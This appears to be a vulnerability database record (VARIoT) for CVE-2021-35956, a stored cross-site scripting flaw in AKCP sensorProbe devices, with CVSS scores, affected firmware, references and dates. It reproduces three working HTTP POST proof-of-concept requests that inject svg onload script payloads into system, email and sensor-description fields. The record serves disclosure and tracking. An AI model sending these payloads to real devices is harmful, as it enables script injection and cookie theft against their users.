VAR-202106-1093

Vulnerability from variot - Updated: 2023-12-18 13:22

Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring device from AKCP, a company in the United States. To set it up, just assign an IP address and connect to the embedded web server. Because the web server does not correctly verify client data, an attacker can use this vulnerability to lure users into clicking, which executes client-side code that steals the user's cookie credentials.

1) Stored Cross-Site Scripting via System Settings

POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save

2) Stored Cross-Site Scripting via Email Settings

POST /mail?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save

3) Stored Cross-Site Scripting via Sensor Description

POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CPCookie=sensors=400
Connection: close

_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202106-1093",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "sensorprobe8-x60",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "akcp",
        "version": "sp480-20210624"
      },
      {
        "model": "sensorprobe2",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "akcp",
        "version": "sp480-20210624"
      },
      {
        "model": "sensorprobe8-x20",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "akcp",
        "version": "sp480-20210624"
      },
      {
        "model": "sensorprobe4",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "akcp",
        "version": "sp480-20210624"
      },
      {
        "model": "sensorprobe8",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "akcp",
        "version": "sp480-20210624"
      },
      {
        "model": "sensorprobe \u003csp480-20210624",
        "scope": null,
        "trust": 0.6,
        "vendor": "akcp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-35956"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:akcp:sensorprobe2_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "sp480-20210624",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:akcp:sensorprobe2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:akcp:sensorprobe4_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "sp480-20210624",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:akcp:sensorprobe4:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:akcp:sensorprobe8_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "sp480-20210624",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:akcp:sensorprobe8:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:akcp:sensorprobe8-x20_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "sp480-20210624",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:akcp:sensorprobe8-x20:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:akcp:sensorprobe8-x60_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "sp480-20210624",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:akcp:sensorprobe8-x60:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-35956"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Tyler Butler",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163343"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2021-35956",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 6.8,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2021-46654",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULMON",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 6.8,
            "id": "CVE-2021-35956",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "LOW",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.3,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-35956",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-46654",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202106-1985",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-35956",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-35956"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-35956"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-1985"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials. \n\n\n1) Stored Cross-Site Scripting via System Settings  \n\nPOST /system?time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 114\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/system?time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n_SA01=System+Namer\u0026_SA02=RDC\u0026_SA03=Name\u003csvg/onload=alert`xss`\u003e\u0026_SA04=1\u0026_SA06=0\u0026_SA36=0\u0026_SA37=0\u0026sbt1=Save\n\n2) Stored Cross-Site Scripting via Email Settings  \n\nPOST /mail?time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 162\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/mail?time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n\n_PS03=test@test.com\u0026_PS04=test@test.com\u0026_PS05_0=test@test.com\u0026_PS05_1=test@test.comr\u0026_PS05_3=\u003csvg/onload=alert`xxss`\u003e\u0026_PS05_4=\u0026sbt2=Save\n\n3) Stored Cross-Site Scripting via Sensor Description\n\nPOST /senswatr?index=0\u0026time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 55\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/senswatr?index=0\u0026time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: CPCookie=sensors=400\nConnection: close\n\n_WT00-IX=\"\u003e\u003csvg/onload=alert`xss`\u003e\u0026_WT03-IX=2\u0026sbt1=Save\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-35956"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-35956"
      },
      {
        "db": "PACKETSTORM",
        "id": "163343"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-35956",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "163343",
        "trust": 1.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50080",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-1985",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-35956",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-35956"
      },
      {
        "db": "PACKETSTORM",
        "id": "163343"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-35956"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-1985"
      }
    ]
  },
  "id": "VAR-202106-1093",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:22:50.963000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "CVE-2021-35956",
        "trust": 0.1,
        "url": "https://github.com/tcbutler320/cve-2021-35956 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-35956"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-35956"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://tbutler.org/2021/06/28/cve-2021-35956"
      },
      {
        "trust": 1.7,
        "url": "https://www.akcp.com/support-center/customer-login/sensor-probe-firmware-changelog/"
      },
      {
        "trust": 1.7,
        "url": "http://www.akcp.in.th/downloads/firmwares/sp480-20210624.zip"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/163343/akcp-sensorprobe-spx476-cross-site-scripting.html"
      },
      {
        "trust": 1.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-35956"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50080"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/79.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/tcbutler320/cve-2021-35956"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://[target]/mail?time=32e004c941f912"
      },
      {
        "trust": 0.1,
        "url": "http://[target]/senswatr?index=0\u0026time=32e004c941f912"
      },
      {
        "trust": 0.1,
        "url": "http://[target]"
      },
      {
        "trust": 0.1,
        "url": "https://www.akcp.com/"
      },
      {
        "trust": 0.1,
        "url": "https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/"
      },
      {
        "trust": 0.1,
        "url": "http://[target]/system?time=32e004c941f912"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-35956"
      },
      {
        "db": "PACKETSTORM",
        "id": "163343"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-35956"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-1985"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-35956"
      },
      {
        "db": "PACKETSTORM",
        "id": "163343"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-35956"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-1985"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      },
      {
        "date": "2021-06-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-35956"
      },
      {
        "date": "2021-07-02T15:30:25",
        "db": "PACKETSTORM",
        "id": "163343"
      },
      {
        "date": "2021-06-30T12:15:07.683000",
        "db": "NVD",
        "id": "CVE-2021-35956"
      },
      {
        "date": "2021-06-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202106-1985"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-07-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      },
      {
        "date": "2021-07-06T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-35956"
      },
      {
        "date": "2021-07-06T13:20:33.377000",
        "db": "NVD",
        "id": "CVE-2021-35956"
      },
      {
        "date": "2021-07-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202106-1985"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-1985"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "AKCP sensorProbe cross-site scripting vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-46654"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-1985"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163343"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-1985"
      }
    ],
    "trust": 0.7
  }
}

